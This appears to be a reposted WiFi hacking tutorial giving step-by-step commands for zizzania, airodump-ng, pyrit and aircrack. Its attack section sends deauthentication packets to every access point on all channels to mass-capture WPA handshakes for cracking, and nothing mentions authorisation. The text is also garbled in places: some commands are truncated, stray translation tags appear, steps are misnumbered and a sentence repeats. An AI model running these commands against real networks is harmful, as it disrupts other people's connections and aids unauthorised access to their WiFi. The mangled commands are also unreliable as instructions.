Massive automated handshake capture on BlackArch with zizzania automate Wifi Hacking tutorial

Massive automated handshake capture on BlackArch with zizzania automate Wifi Hacking  tutorial


1) git clone
2) cd  zizzania
3) for debian/kali/parrot...
> sudo apt-get install libpcap-dev

🦑For macOS systems (Homebrew):
1)brew install libpcap
3)make -f config.Makefile
5)The installation process is not mandatory, zizzania can be run from the src directory. Just in case:
> make install
> make uninstall
6) now Channel switching must be performed manually:

ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
7)sudo airport --disassociate
8)sudo airport --channel=<channel>

🦑We re ready now :
1)  Suppose we  are interested in an access point with BSSID AA: BB: CC: DD: EE: FF, but very rarely (once a day, once a week, once a month) clients connect to it.
We can run zizzania on the network interface -i wlp2s0 , restrict listening to the sixth channel  -c 6 (if we specify the channel, the program switches the network interface to monitoring mode), specify the access point we are interested in  -b AA: BB: CC: DD: EE: FF and the file to which the intercepted handshakes -w out.pcap should be written :

<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo zizzania -i wl

2) Suppose we want to listen to a specific channel and we are interested in all access points on it. Then the command will look something like this (we did not specify the -b switch with the BSSID of any AP):

<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo zizzania -i wlp2s0 -c 1 -2 -w zizza / out5</font></font>

3) We want to capture handshakes from all access points of all channels. At the same time,

>   use a deauthentication attack to get the maximum possible handshakesWe want to capture handshakes from all access points of all channels. At the same time, we want to use a deauthentication attack to get the maximum possible handshakes

Lets run :
>use the --berlin 1200 option . It is needed only so that access points do not crash too quickly from the screen (this does not affect the work in any way)

2) sudo airodump-ng wlp2s0 -f 30000 -w hndshk/auto5 --berlin 1200
When starting zizzania, I specify only the name of the wireless interface on which it will work (send deauthentication packets)
3) sudo zizzania -i wlp2s0

4) pyrit -r "hndshk/auto5-01.cap" analyze
(note auto5... its name of pcapfile )

5) finally use any packets in aircrack & Wait till done

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